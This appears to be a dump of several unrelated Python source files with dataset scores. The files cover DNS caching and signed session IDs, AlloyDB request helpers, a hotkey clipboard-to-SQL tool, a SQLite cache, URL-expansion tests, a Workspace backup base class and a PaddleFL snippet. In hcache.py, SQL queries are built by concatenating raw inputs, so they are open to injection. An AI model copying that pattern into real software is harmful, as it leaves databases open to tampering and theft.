Retrieves the full set of identified IP addresses associated with the DNS name. This does not use
`socket.gethostbyname` because there may be a pool of addresses associated with the rDNS name, not just one.
Can generate statistics from live operation by calling the `cache_info` method:
>>> DNS.resolve.cache_info()
CacheInfo(hits=28, misses=16, maxsize=128, currsize=16)
"""
try:
return {resolution[4][0] for resolution in _forward(host, 80)}
except DNSError:
return set()
@staticmethod
@ttl_cache(maxsize=TTL_ENTRIES, ttl=TTL_TIME)
def reverse(addr:str) -> Optional[str]:
"""Perform a cached reverse DNS lookup.
Can generate statistics from live operation by calling the `cache_info` method:
>>> DNS.reverse.cache_info()
CacheInfo(hits=28, misses=16, maxsize=128, currsize=16)
"""
try:
return _reverse(addr)[0]
except DNSError:
return None
class SessionIdentifier:
def __init__(self, value=None):
if value:
self.parse(value)
else:
self.generate()
def parse(self, value):
self.time = int(value[:8], 16)
self.machine = int(value[8:14], 16)
self.process = int(value[14:18], 16)
self.counter = int(value[18:24], 16)
def generate(self):
self.time = int(time())
self.machine = MACHINE
self.process = getpid() % 0xFFFF
self.counter = next(counter)
def __bytes__(self):
return str(self).encode('ascii')
def __str__(self):
return f"{self.time:08x}{self.machine:06x}{self.process:04x}{self.counter:06x}"
def __repr__(self):
return f"{self.__class__.__name__}('{self}')"
class SignedSessionIdentifier(SessionIdentifier):
__slots__ = ('__secret', '__signature', 'expires')
def __init__(self, value=None, secret=None, expires=None):
self.__secret = secret.encode('ascii') if hasattr(secret, 'encode') else secret
self.__signature = None
self.expires = expires
super().__init__(value)
def parse(self, value):
if len(value) != 88:
raise SignatureError("Invalid signed identifier length.")
super().parse(value)
self.__signature = value[24:].encode('ascii')
if not self.valid:
raise SignatureError("Invalid signed identifier.")
@property
def signed(self):
return bytes(self) + self.signature
@property
def signature(self):
if not self.__signature:
self.__signature = hmac(
self.__secret,
unhexlify(bytes(self)),
sha256
).hexdigest()
if hasattr(self.__signature, 'encode'):
self.__signature = self.__signature.encode('ascii')
return self.__signature
@property
def valid(self):
if not self.__signature:
raise SignatureError("No signature present.")
return False
if self.expires and (time() - self.time) > self.expires:
raise SignatureError("Expired signature.")
return False
challenge = hmac(
self.__secret,
unhexlify(bytes(self)),
sha256
).hexdigest()
if hasattr(challenge, 'encode'):
challenge = challenge.encode('ascii')
result = compare_digest(challenge, self.signature)
if not result:
raise SignatureError("Invalid signature:", repr(challenge), repr(self.signature))
return False
return True | 0.722331 | 0.123181 |
"""Helper functions for constructing and validating AlloyDB instance requests."""
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
from googlecloudsdk.command_lib.util.args import labels_util
from googlecloudsdk.core import properties
def ConstructCreateRequestFromArgs(client, alloydb_messages, project_ref, args):
"""Validates command line input arguments and passes parent's resources.
Args:
client: Client for api_utils.py class.
alloydb_messages: Messages module for the API client.
project_ref: parent resource path of the resource being created
args: Command line input arguments.
Returns:
Fully-constructed request to create an AlloyDB instance.
"""
instance_resource = alloydb_messages.Instance()
# set availability-type if provided
instance_resource.availabilityType = _ParseAvailabilityType(
alloydb_messages, args.availability_type)
instance_resource.machineConfig = alloydb_messages.MachineConfig(
cpuCount=args.machine_cpu)
instance_ref = client.resource_parser.Create(
'alloydb.projects.locations.clusters.instances',
projectsId=properties.VALUES.core.project.GetOrFail,
locationsId=args.region,
clustersId=args.cluster,
instancesId=args.instance)
instance_resource.name = instance_ref.RelativeName()
instance_resource.databaseFlags = labels_util.ParseCreateArgs(
args,
alloydb_messages.Instance.DatabaseFlagsValue,
labels_dest='database_flags')
instance_resource.gceZone = args.zone
instance_resource.instanceType = _ParseInstanceType(alloydb_messages,
args.instance_type)
instance_resource.networkConfig = _ParseNetworkConfig(alloydb_messages,
args.assign_ip)
if instance_resource.instanceType == alloydb_messages.Instance.InstanceTypeValueValuesEnum.READ_POOL:
instance_resource.readPoolConfig = alloydb_messages.ReadPoolConfig(
nodeCount=args.read_pool_node_count)
# TODO(b/185795425): Need better understanding of use cases before adding
# instance_resource.networkConfig
# sslRequired (--require-ssl)
# instance_resource.labels (--labels)
return (
alloydb_messages.AlloydbProjectsLocationsClustersInstancesCreateRequest(
instance=instance_resource,
instanceId=args.instance,
parent=project_ref.RelativeName()))
def ConstructPatchRequestFromArgs(alloydb_messages, instance_ref, args):
"""Validates command line input arguments and passes parent's resources.
Args:
alloydb_messages: Messages module for the API client.
instance_ref: parent resource path of the resource being updated
args: Command line input arguments.
Returns:
Fully-constructed request to update an AlloyDB instance.
"""
instance_resource = alloydb_messages.Instance()
# set availability-type if provided
instance_resource.availabilityType = _ParseAvailabilityType(
alloydb_messages, args.availability_type)
instance_resource.machineConfig = alloydb_messages.MachineConfig(
cpuCount=args.machine_cpu)
instance_resource.name = instance_ref.RelativeName()
instance_resource.databaseFlags = labels_util.ParseCreateArgs(
args,
alloydb_messages.Instance.DatabaseFlagsValue,
labels_dest='database_flags')
instance_resource.gceZone = args.zone
instance_resource.instanceType = _ParseInstanceType(alloydb_messages,
args.instance_type)
instance_resource.networkConfig = _ParseNetworkConfig(alloydb_messages,
args.assign_ip)
if args.read_pool_node_count:
instance_resource.readPoolConfig = alloydb_messages.ReadPoolConfig(
nodeCount=args.read_pool_node_count)
# TODO(b/185795425): Need better understanding of use cases before adding
# instance_resource.networkConfig
# sslRequired (--require-ssl)
# instance_resource.labels (--labels)
return (
alloydb_messages.AlloydbProjectsLocationsClustersInstancesPatchRequest(
instance=instance_resource,
name=instance_ref.RelativeName()))
def _ParseAvailabilityType(alloydb_messages, availability_type):
if availability_type:
return alloydb_messages.Instance.AvailabilityTypeValueValuesEnum.lookup_by_name(
availability_type.upper())
return None
def _ParseInstanceType(alloydb_messages, instance_type):
if instance_type:
return alloydb_messages.Instance.InstanceTypeValueValuesEnum.lookup_by_name(
instance_type.upper())
return None
def _ParseNetworkConfig(alloydb_messages, assign_ip):
if assign_ip:
return alloydb_messages.NetworkConfig(publicIpEnabled=assign_ip)
return None | lib/googlecloudsdk/command_lib/alloydb/instance_helper.py | """Helper functions for constructing and validating AlloyDB instance requests."""
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
from googlecloudsdk.command_lib.util.args import labels_util
from googlecloudsdk.core import properties
def ConstructCreateRequestFromArgs(client, alloydb_messages, project_ref, args):
"""Validates command line input arguments and passes parent's resources.
Args:
client: Client for api_utils.py class.
alloydb_messages: Messages module for the API client.
project_ref: parent resource path of the resource being created
args: Command line input arguments.
Returns:
Fully-constructed request to create an AlloyDB instance.
"""
instance_resource = alloydb_messages.Instance()
# set availability-type if provided
instance_resource.availabilityType = _ParseAvailabilityType(
alloydb_messages, args.availability_type)
instance_resource.machineConfig = alloydb_messages.MachineConfig(
cpuCount=args.machine_cpu)
instance_ref = client.resource_parser.Create(
'alloydb.projects.locations.clusters.instances',
projectsId=properties.VALUES.core.project.GetOrFail,
locationsId=args.region,
clustersId=args.cluster,
instancesId=args.instance)
instance_resource.name = instance_ref.RelativeName()
instance_resource.databaseFlags = labels_util.ParseCreateArgs(
args,
alloydb_messages.Instance.DatabaseFlagsValue,
labels_dest='database_flags')
instance_resource.gceZone = args.zone
instance_resource.instanceType = _ParseInstanceType(alloydb_messages,
args.instance_type)
instance_resource.networkConfig = _ParseNetworkConfig(alloydb_messages,
args.assign_ip)
if instance_resource.instanceType == alloydb_messages.Instance.InstanceTypeValueValuesEnum.READ_POOL:
instance_resource.readPoolConfig = alloydb_messages.ReadPoolConfig(
nodeCount=args.read_pool_node_count)
# TODO(b/185795425): Need better understanding of use cases before adding
# instance_resource.networkConfig
# sslRequired (--require-ssl)
# instance_resource.labels (--labels)
return (
alloydb_messages.AlloydbProjectsLocationsClustersInstancesCreateRequest(
instance=instance_resource,
instanceId=args.instance,
parent=project_ref.RelativeName()))
def ConstructPatchRequestFromArgs(alloydb_messages, instance_ref, args):
"""Validates command line input arguments and passes parent's resources.
Args:
alloydb_messages: Messages module for the API client.
instance_ref: parent resource path of the resource being updated
args: Command line input arguments.
Returns:
Fully-constructed request to update an AlloyDB instance.
"""
instance_resource = alloydb_messages.Instance()
# set availability-type if provided
instance_resource.availabilityType = _ParseAvailabilityType(
alloydb_messages, args.availability_type)
instance_resource.machineConfig = alloydb_messages.MachineConfig(
cpuCount=args.machine_cpu)
instance_resource.name = instance_ref.RelativeName()
instance_resource.databaseFlags = labels_util.ParseCreateArgs(
args,
alloydb_messages.Instance.DatabaseFlagsValue,
labels_dest='database_flags')
instance_resource.gceZone = args.zone
instance_resource.instanceType = _ParseInstanceType(alloydb_messages,
args.instance_type)
instance_resource.networkConfig = _ParseNetworkConfig(alloydb_messages,
args.assign_ip)
if args.read_pool_node_count:
instance_resource.readPoolConfig = alloydb_messages.ReadPoolConfig(
nodeCount=args.read_pool_node_count)
# TODO(b/185795425): Need better understanding of use cases before adding
# instance_resource.networkConfig
# sslRequired (--require-ssl)
# instance_resource.labels (--labels)
return (
alloydb_messages.AlloydbProjectsLocationsClustersInstancesPatchRequest(
instance=instance_resource,
name=instance_ref.RelativeName()))
def _ParseAvailabilityType(alloydb_messages, availability_type):
if availability_type:
return alloydb_messages.Instance.AvailabilityTypeValueValuesEnum.lookup_by_name(
availability_type.upper())
return None
def _ParseInstanceType(alloydb_messages, instance_type):
if instance_type:
return alloydb_messages.Instance.InstanceTypeValueValuesEnum.lookup_by_name(
instance_type.upper())
return None
def _ParseNetworkConfig(alloydb_messages, assign_ip):
if assign_ip:
return alloydb_messages.NetworkConfig(publicIpEnabled=assign_ip)
return None | 0.643665 | 0.15863 |
from pynput.keyboard import Key, KeyCode, Listener
import pyperclip
from utils import expand_ranges
from utils import clean_where_clause
import re
import sys
# Copy a code range a automagically paste a SQL ready statement!
# SHFT-L
def parse_ranges(txt=None):
if not txt:
txt = pyperclip.paste()
code_pat = re.compile(r"[a-zA-Z]\d{4}|\d{5}|\d{4}[a-zA-Z]")
codes = re.findall(pattern=code_pat, string=txt)
try:
code_list = expand_ranges(codes)
except:
print("Could not iterate this range!")
code_list = codes
finally:
msg = "(\n" + "".join(["'" + code + "',\n" for code in code_list]) + ")"
pyperclip.copy(msg)
return msg
# Copy a list and automagically paste a SQL ready statement!
# SHFT-L
def parse_list(txt= None):
if not txt:
txt = pyperclip.paste()
msg = "(\n" + "".join(["'" + code + "',\n" for code in txt.split(',')]) + ")"
pyperclip.copy(msg)
return msg
# Copy the text from which you wish to extract the text into your clipboard and then execute this script.
# SHIFT-C
def grab_codes(txt=None):
if not txt:
txt = pyperclip.paste()
code_pat = re.compile(r"[a-zA-Z]\d{4}|\d{5}|\d{4}[a-zA-Z]")
txt = txt.strip()
codes = re.findall(pattern=code_pat, string=txt)
pyperclip.copy(",".join(codes))
return codes
# Copy the text from which you wish to extract the text into your clipboard and then execute this script.
# SHIFT-W
def clean_clause(txt=None):
if not txt:
txt = pyperclip.paste()
table = clean_where_clause(txt)
print(table)
pyperclip.copy(table)
return table
def kill_program(txt=None):
print("Program stopped...")
sys.exit(0)
# Create a mapping of keys to function (use frozenset as sets are not hashable - so they can't be used as keys)
combination_to_function = {
frozenset(
[Key.shift, KeyCode(char="c")]
): grab_codes, # No `()` after function_1 because we want to pass the function, not the value of the function
frozenset([Key.shift, KeyCode(char="C")]): grab_codes,
frozenset([Key.shift, KeyCode(char="L")]): parse_ranges,
frozenset([Key.shift, KeyCode(char="l")]): parse_ranges,
frozenset([Key.shift, KeyCode(char="w")]): clean_clause,
frozenset([Key.shift, KeyCode(char="W")]): clean_clause,
frozenset([Key.shift, KeyCode(char="P")]): parse_list,
frozenset([Key.shift, KeyCode(char="p")]): parse_list,
frozenset([Key.esc]): kill_program,
}
# Currently pressed keys
current_keys = set()
def on_press(key):
# When a key is pressed, add it to the set we are keeping track of and check if this set is in the dictionary
current_keys.add(key)
if frozenset(current_keys) in combination_to_function:
# If the current set of keys are in the mapping, execute the function
import inspect
combination_to_function[frozenset(current_keys)](pyperclip.paste())
def on_release(key):
# When a key is released, remove it from the set of keys we are keeping track of
current_keys.remove(key)
def main():
print("Running...")
with Listener(on_press=on_press, on_release=on_release) as listener:
try:
listener.join()
except KeyboardInterrupt:
print("Program stopped.")
if __name__ == "__main__":
main() | clip_parser/clip_parser.py | from pynput.keyboard import Key, KeyCode, Listener
import pyperclip
from utils import expand_ranges
from utils import clean_where_clause
import re
import sys
# Copy a code range a automagically paste a SQL ready statement!
# SHFT-L
def parse_ranges(txt=None):
if not txt:
txt = pyperclip.paste()
code_pat = re.compile(r"[a-zA-Z]\d{4}|\d{5}|\d{4}[a-zA-Z]")
codes = re.findall(pattern=code_pat, string=txt)
try:
code_list = expand_ranges(codes)
except:
print("Could not iterate this range!")
code_list = codes
finally:
msg = "(\n" + "".join(["'" + code + "',\n" for code in code_list]) + ")"
pyperclip.copy(msg)
return msg
# Copy a list and automagically paste a SQL ready statement!
# SHFT-L
def parse_list(txt= None):
if not txt:
txt = pyperclip.paste()
msg = "(\n" + "".join(["'" + code + "',\n" for code in txt.split(',')]) + ")"
pyperclip.copy(msg)
return msg
# Copy the text from which you wish to extract the text into your clipboard and then execute this script.
# SHIFT-C
def grab_codes(txt=None):
if not txt:
txt = pyperclip.paste()
code_pat = re.compile(r"[a-zA-Z]\d{4}|\d{5}|\d{4}[a-zA-Z]")
txt = txt.strip()
codes = re.findall(pattern=code_pat, string=txt)
pyperclip.copy(",".join(codes))
return codes
# Copy the text from which you wish to extract the text into your clipboard and then execute this script.
# SHIFT-W
def clean_clause(txt=None):
if not txt:
txt = pyperclip.paste()
table = clean_where_clause(txt)
print(table)
pyperclip.copy(table)
return table
def kill_program(txt=None):
print("Program stopped...")
sys.exit(0)
# Create a mapping of keys to function (use frozenset as sets are not hashable - so they can't be used as keys)
combination_to_function = {
frozenset(
[Key.shift, KeyCode(char="c")]
): grab_codes, # No `()` after function_1 because we want to pass the function, not the value of the function
frozenset([Key.shift, KeyCode(char="C")]): grab_codes,
frozenset([Key.shift, KeyCode(char="L")]): parse_ranges,
frozenset([Key.shift, KeyCode(char="l")]): parse_ranges,
frozenset([Key.shift, KeyCode(char="w")]): clean_clause,
frozenset([Key.shift, KeyCode(char="W")]): clean_clause,
frozenset([Key.shift, KeyCode(char="P")]): parse_list,
frozenset([Key.shift, KeyCode(char="p")]): parse_list,
frozenset([Key.esc]): kill_program,
}
# Currently pressed keys
current_keys = set()
def on_press(key):
# When a key is pressed, add it to the set we are keeping track of and check if this set is in the dictionary
current_keys.add(key)
if frozenset(current_keys) in combination_to_function:
# If the current set of keys are in the mapping, execute the function
import inspect
combination_to_function[frozenset(current_keys)](pyperclip.paste())
def on_release(key):
# When a key is released, remove it from the set of keys we are keeping track of
current_keys.remove(key)
def main():
print("Running...")
with Listener(on_press=on_press, on_release=on_release) as listener:
try:
listener.join()
except KeyboardInterrupt:
print("Program stopped.")
if __name__ == "__main__":
main() | 0.358129 | 0.207155 |
import sqlite3
from sqlite3 import Error
def create_connection(db_file):
""" create a database connection to the SQLite database
specified by db_file
:param db_file: database file
:return: Connection object or None
"""
conn = None
try:
conn = sqlite3.connect(db_file)
return conn
except Error as e:
print(e)
return conn
# -------------------------------------------------------------------
def have_position(x):
database = r"hcache.db"
rows = []
conn = create_connection(database)
if conn is not None:
query = ("SELECT * FROM position WHERE ticker = '"+x+"';")
cursor = conn.cursor()
count = cursor.execute(query)
rows = cursor.fetchall()
#print ("OUT:",rows)
cursor.close()
else:
print("Error! cannot create the database connection.")
if rows == []:
found = False
else:
found = True
return found
# -------------------------------------------------------------------
def return_position(x):
database = r"hcache.db"
rows = []
conn = create_connection(database)
if conn is not None:
query = ("SELECT * FROM position WHERE 1=1;")
cursor = conn.cursor()
count = cursor.execute(query)
rows = cursor.fetchall()
cursor.close()
else:
print("Error! cannot create the database connection.")
return rows
# ------------------------------
def create_table(conn, create_table_sql):
try:
c = conn.cursor()
c.execute(create_table_sql)
except Error as e:
print(e)
# ------------------------------
def create_1m():
database = r"hcache.db"
sql_create_trades_table = """ CREATE TABLE IF NOT EXISTS history_1m (
symbol text,
open text,
close text,
high text,
low text,
volume text
); """
# create a database connection
conn = create_connection(database)
# create tables
if conn is not None:
# create projects table
create_table(conn, sql_create_trades_table)
else:
print("Error! cannot create the database connection.")
# ------------------------------
def create_listings():
database = r"hcache.db"
sql_create_trades_table = """ CREATE TABLE IF NOT EXISTS listings (
symbol text,
securityname text,
etf text
); """
# create a database connection
conn = create_connection(database)
# create tables
if conn is not None:
# create projects table
create_table(conn, sql_create_trades_table)
else:
print("Error! cannot create the database connection.")
# ------------------------------
def insert_into_listings(symbol,securityname,etf):
database = r"hcache.db"
conn = create_connection(database)
sqlite_statement = ("INSERT INTO listings (symbol, securityname, etf)\n" +
"VALUES(\""+symbol+"\"," +
"\""+securityname+"\","+
"\""+etf+"\""+");")
cursor = conn.cursor()
count = cursor.execute(sqlite_statement)
conn.commit()
cursor.close()
# ------------------------------
def download(tickers="", interval="", start=""):
print("Searching:", tickers)
return | hcache.py | import sqlite3
from sqlite3 import Error
def create_connection(db_file):
""" create a database connection to the SQLite database
specified by db_file
:param db_file: database file
:return: Connection object or None
"""
conn = None
try:
conn = sqlite3.connect(db_file)
return conn
except Error as e:
print(e)
return conn
# -------------------------------------------------------------------
def have_position(x):
database = r"hcache.db"
rows = []
conn = create_connection(database)
if conn is not None:
query = ("SELECT * FROM position WHERE ticker = '"+x+"';")
cursor = conn.cursor()
count = cursor.execute(query)
rows = cursor.fetchall()
#print ("OUT:",rows)
cursor.close()
else:
print("Error! cannot create the database connection.")
if rows == []:
found = False
else:
found = True
return found
# -------------------------------------------------------------------
def return_position(x):
database = r"hcache.db"
rows = []
conn = create_connection(database)
if conn is not None:
query = ("SELECT * FROM position WHERE 1=1;")
cursor = conn.cursor()
count = cursor.execute(query)
rows = cursor.fetchall()
cursor.close()
else:
print("Error! cannot create the database connection.")
return rows
# ------------------------------
def create_table(conn, create_table_sql):
try:
c = conn.cursor()
c.execute(create_table_sql)
except Error as e:
print(e)
# ------------------------------
def create_1m():
database = r"hcache.db"
sql_create_trades_table = """ CREATE TABLE IF NOT EXISTS history_1m (
symbol text,
open text,
close text,
high text,
low text,
volume text
); """
# create a database connection
conn = create_connection(database)
# create tables
if conn is not None:
# create projects table
create_table(conn, sql_create_trades_table)
else:
print("Error! cannot create the database connection.")
# ------------------------------
def create_listings():
database = r"hcache.db"
sql_create_trades_table = """ CREATE TABLE IF NOT EXISTS listings (
symbol text,
securityname text,
etf text
); """
# create a database connection
conn = create_connection(database)
# create tables
if conn is not None:
# create projects table
create_table(conn, sql_create_trades_table)
else:
print("Error! cannot create the database connection.")
# ------------------------------
def insert_into_listings(symbol,securityname,etf):
database = r"hcache.db"
conn = create_connection(database)
sqlite_statement = ("INSERT INTO listings (symbol, securityname, etf)\n" +
"VALUES(\""+symbol+"\"," +
"\""+securityname+"\","+
"\""+etf+"\""+");")
cursor = conn.cursor()
count = cursor.execute(sqlite_statement)
conn.commit()
cursor.close()
# ------------------------------
def download(tickers="", interval="", start=""):
print("Searching:", tickers)
return | 0.110405 | 0.07403 |
import unittest
from NwalaTextUtils.textutils import cleanHtml
from NwalaTextUtils.textutils import derefURI
from NwalaTextUtils.textutils import expandURL
from NwalaTextUtils.textutils import expandURLs
from NwalaTextUtils.textutils import getPgTitleFrmHTML
from NwalaTextUtils.textutils import parallelGetTxtFrmURIs
class TestTextutils(unittest.TestCase):
def test_deref_boilrm_title(self):
uri = 'https://time.com/3505982/ebola-new-cases-world-health-organization/'
html = derefURI(uri, 0)
plaintext = cleanHtml(html)
title = getPgTitleFrmHTML(html)
self.assertGreater( len(html), 1000, "html.len < 1000" )
self.assertGreater( len(plaintext), 1000, "plaintext.len < 1000" )
self.assertGreater( len(title), 10, "title.len < 10" )
'''
print( 'title:', title.strip() )
print( 'html prefix (' + str(len(html)) + ' chars):', html[:11].strip() )
print( 'plaintext prefix (' + str(len(plaintext)) + ' chars)', plaintext[:21].strip() )
'''
def test_deref_boilrm_title_prl(self):
uris_lst = [
'http://www.euro.who.int/en/health-topics/emergencies/pages/news/news/2015/03/united-kingdom-is-declared-free-of-ebola-virus-disease',
'https://time.com/3505982/ebola-new-cases-world-health-organization/',
'https://www.scientificamerican.com/article/why-ebola-survivors-struggle-with-new-symptoms/'
]
doc_lst = parallelGetTxtFrmURIs(uris_lst)
self.assertEqual( len(doc_lst), 3, "doc_lst.len != 3" )
for d in doc_lst:
self.assertGreater( len(d['text']), 1000, "text.len < 1000" )
self.assertGreater( len(d['uri']), 10, "uri.len < 1000" )
self.assertGreater( len(d['title']), 10, "title.len < 10" )
def test_expand_url_single(self):
short_u = 'https://t.co/OfAQRC1Opd?amp=1'
long_u = expandURL(short_u)
key = 'https://towardsdatascience.com/how-you-should-read-research-papers-according-to-andrew-ng-stanford-deep-learning-lectures-98ecbd3ccfb3'
self.assertEqual( long_u, key, "long_u != key" )
def test_expand_url_multiple(self):
uris_lst = [
'https://t.co/OfAQRC1Opd?amp=1',
'https://t.co/uqJhpqpUcl?amp=1'
]
url_keys = [
'https://towardsdatascience.com/how-you-should-read-research-papers-according-to-andrew-ng-stanford-deep-learning-lectures-98ecbd3ccfb3',
'https://www.theguardian.com/us-news/2015/dec/15/michigan-mayor-declares-manmade-disaster-lead-tainted-water-supply'
]
res = expandURLs(uris_lst)
for i in range( len(res) ):
long_u = res[i]
self.assertEqual( long_u, url_keys[i], "long_u != key" )
uris_lst = [
{'url': 'https://t.co/OfAQRC1Opd?amp=1'},
{'url': 'https://t.co/uqJhpqpUcl?amp=1'}
]
res = expandURLs(uris_lst)
for i in range( len(res) ):
long_u = res[i]['long_url']
self.assertEqual( long_u, url_keys[i], "long_u != key" )
if __name__ == '__main__':
unittest.main() | tests/test_generic.py | import unittest
from NwalaTextUtils.textutils import cleanHtml
from NwalaTextUtils.textutils import derefURI
from NwalaTextUtils.textutils import expandURL
from NwalaTextUtils.textutils import expandURLs
from NwalaTextUtils.textutils import getPgTitleFrmHTML
from NwalaTextUtils.textutils import parallelGetTxtFrmURIs
class TestTextutils(unittest.TestCase):
def test_deref_boilrm_title(self):
uri = 'https://time.com/3505982/ebola-new-cases-world-health-organization/'
html = derefURI(uri, 0)
plaintext = cleanHtml(html)
title = getPgTitleFrmHTML(html)
self.assertGreater( len(html), 1000, "html.len < 1000" )
self.assertGreater( len(plaintext), 1000, "plaintext.len < 1000" )
self.assertGreater( len(title), 10, "title.len < 10" )
'''
print( 'title:', title.strip() )
print( 'html prefix (' + str(len(html)) + ' chars):', html[:11].strip() )
print( 'plaintext prefix (' + str(len(plaintext)) + ' chars)', plaintext[:21].strip() )
'''
def test_deref_boilrm_title_prl(self):
uris_lst = [
'http://www.euro.who.int/en/health-topics/emergencies/pages/news/news/2015/03/united-kingdom-is-declared-free-of-ebola-virus-disease',
'https://time.com/3505982/ebola-new-cases-world-health-organization/',
'https://www.scientificamerican.com/article/why-ebola-survivors-struggle-with-new-symptoms/'
]
doc_lst = parallelGetTxtFrmURIs(uris_lst)
self.assertEqual( len(doc_lst), 3, "doc_lst.len != 3" )
for d in doc_lst:
self.assertGreater( len(d['text']), 1000, "text.len < 1000" )
self.assertGreater( len(d['uri']), 10, "uri.len < 1000" )
self.assertGreater( len(d['title']), 10, "title.len < 10" )
def test_expand_url_single(self):
short_u = 'https://t.co/OfAQRC1Opd?amp=1'
long_u = expandURL(short_u)
key = 'https://towardsdatascience.com/how-you-should-read-research-papers-according-to-andrew-ng-stanford-deep-learning-lectures-98ecbd3ccfb3'
self.assertEqual( long_u, key, "long_u != key" )
def test_expand_url_multiple(self):
uris_lst = [
'https://t.co/OfAQRC1Opd?amp=1',
'https://t.co/uqJhpqpUcl?amp=1'
]
url_keys = [
'https://towardsdatascience.com/how-you-should-read-research-papers-according-to-andrew-ng-stanford-deep-learning-lectures-98ecbd3ccfb3',
'https://www.theguardian.com/us-news/2015/dec/15/michigan-mayor-declares-manmade-disaster-lead-tainted-water-supply'
]
res = expandURLs(uris_lst)
for i in range( len(res) ):
long_u = res[i]
self.assertEqual( long_u, url_keys[i], "long_u != key" )
uris_lst = [
{'url': 'https://t.co/OfAQRC1Opd?amp=1'},
{'url': 'https://t.co/uqJhpqpUcl?amp=1'}
]
res = expandURLs(uris_lst)
for i in range( len(res) ):
long_u = res[i]['long_url']
self.assertEqual( long_u, url_keys[i], "long_u != key" )
if __name__ == '__main__':
unittest.main() | 0.346541 | 0.373819 |
import logging
import logging.handlers
import os
import pwd
import subprocess
import time
from functools import wraps
import httplib2
from apiclient.discovery import build
from oauth2client.client import SignedJwtAssertionCredentials
from .settings import *
TIMING = {}
def get_logger(system):
logger = logging.getLogger(system)
logger.setLevel("INFO")
handler = logging.handlers.SysLogHandler(address='/dev/log')
formatter = logging.Formatter('%(name)s - %(levelname)s - %(message)s')
handler.setFormatter(formatter)
logger.addHandler(handler)
return logger
def timeit(func):
@wraps(func)
def timer(*args, **kwargs):
start = time.time()
result = func(*args, **kwargs)
end = time.time()
name = func.__name__
if name not in TIMING:
TIMING[name] = []
TIMING[name].append(end - start)
return result
return timer
class BackupBase:
def __init__(self, system, user_email):
self.system = system
self.user_email = user_email
self.zfsrootpath = "%s/%s/%s" % (ZPOOL_ROOT_PATH, system, user_email.replace("@", "__"))
self.rootpath = "/%s" % self.zfsrootpath
self.queue = None
self.logger = logging.getLogger("%s.%s" % (system, user_email))
self.timing = {}
def print_timing(self):
print(TIMING)
@timeit
def _impersonate_user(self, scope):
assert scope
self.logger.debug("Impersonating user %s", self.user_email)
with open(SERVICE_ACCOUNT_PKCS12_FILE_PATH, 'rb') as f:
key = f.read()
credentials = SignedJwtAssertionCredentials(SERVICE_ACCOUNT_EMAIL, key, scope=scope, sub=self.user_email)
http = httplib2.Http(".cache")
http = credentials.authorize(http)
credentials.refresh(http)
return (http, credentials)
@timeit
def impersonate_user(self, scope, service_name, service_version=None):
(http, _) = self._impersonate_user(scope)
service = build(serviceName=service_name, version=service_version, http=http)
return service
@timeit
def initialize(self):
assert self.system
if not os.path.exists(self.rootpath):
self.logger.info("Creating %s for %s", self.rootpath, self.user_email)
zfs_p = subprocess.Popen(["/usr/bin/sudo", "/sbin/zfs", "create", self.zfsrootpath])
retcode = zfs_p.wait()
if retcode != 0:
self.logger.error("Unable to create %s for %s", self.rootpath, self.user_email)
return False
if not os.path.exists(self.rootpath):
self.logger.error("Unable to create %s for %s", self.rootpath, self.user_email)
return False
if pwd.getpwuid(os.stat(self.rootpath).st_uid).pw_name != BACKUP_OWNER:
chown_p = subprocess.Popen(["/usr/bin/sudo", "/bin/chown", BACKUP_OWNER, self.rootpath])
retcode = chown_p.wait()
if retcode != 0:
self.logger.error("Unable to change ownership of %s to %s", self.rootpath, BACKUP_OWNER)
return False
try:
self.initialize_service()
except AttributeError:
pass
return True
def run(self, *args, **kwargs):
raise NotImplementedError("run() is not implemented") | helpers.py | import logging
import logging.handlers
import os
import pwd
import subprocess
import time
from functools import wraps
import httplib2
from apiclient.discovery import build
from oauth2client.client import SignedJwtAssertionCredentials
from .settings import *
TIMING = {}
def get_logger(system):
logger = logging.getLogger(system)
logger.setLevel("INFO")
handler = logging.handlers.SysLogHandler(address='/dev/log')
formatter = logging.Formatter('%(name)s - %(levelname)s - %(message)s')
handler.setFormatter(formatter)
logger.addHandler(handler)
return logger
def timeit(func):
@wraps(func)
def timer(*args, **kwargs):
start = time.time()
result = func(*args, **kwargs)
end = time.time()
name = func.__name__
if name not in TIMING:
TIMING[name] = []
TIMING[name].append(end - start)
return result
return timer
class BackupBase:
def __init__(self, system, user_email):
self.system = system
self.user_email = user_email
self.zfsrootpath = "%s/%s/%s" % (ZPOOL_ROOT_PATH, system, user_email.replace("@", "__"))
self.rootpath = "/%s" % self.zfsrootpath
self.queue = None
self.logger = logging.getLogger("%s.%s" % (system, user_email))
self.timing = {}
def print_timing(self):
print(TIMING)
@timeit
def _impersonate_user(self, scope):
assert scope
self.logger.debug("Impersonating user %s", self.user_email)
with open(SERVICE_ACCOUNT_PKCS12_FILE_PATH, 'rb') as f:
key = f.read()
credentials = SignedJwtAssertionCredentials(SERVICE_ACCOUNT_EMAIL, key, scope=scope, sub=self.user_email)
http = httplib2.Http(".cache")
http = credentials.authorize(http)
credentials.refresh(http)
return (http, credentials)
@timeit
def impersonate_user(self, scope, service_name, service_version=None):
(http, _) = self._impersonate_user(scope)
service = build(serviceName=service_name, version=service_version, http=http)
return service
@timeit
def initialize(self):
assert self.system
if not os.path.exists(self.rootpath):
self.logger.info("Creating %s for %s", self.rootpath, self.user_email)
zfs_p = subprocess.Popen(["/usr/bin/sudo", "/sbin/zfs", "create", self.zfsrootpath])
retcode = zfs_p.wait()
if retcode != 0:
self.logger.error("Unable to create %s for %s", self.rootpath, self.user_email)
return False
if not os.path.exists(self.rootpath):
self.logger.error("Unable to create %s for %s", self.rootpath, self.user_email)
return False
if pwd.getpwuid(os.stat(self.rootpath).st_uid).pw_name != BACKUP_OWNER:
chown_p = subprocess.Popen(["/usr/bin/sudo", "/bin/chown", BACKUP_OWNER, self.rootpath])
retcode = chown_p.wait()
if retcode != 0:
self.logger.error("Unable to change ownership of %s to %s", self.rootpath, BACKUP_OWNER)
return False
try:
self.initialize_service()
except AttributeError:
pass
return True
def run(self, *args, **kwargs):
raise NotImplementedError("run() is not implemented") | 0.322739 | 0.060836 |
import os
import sys
import time
import numpy as np
import paddle.fluid as fluid
import paddle_fl.mpc as pfl_mpc
from paddle_fl.mpc.data_utils.data_utils import get_datautils
sys.path.append('..')
import network
import process_data
mpc_protocol_name = 'aby3'
mpc_du = get_datautils(mpc_protocol_name)
def load_uci_update(role, ip, server, port, mpc_model_dir, mpc_model_filename, updated_model_dir):
"""
Load, update and save uci MPC model.
"""
place = fluid.CPUPlace()
exe = fluid.Executor(place)
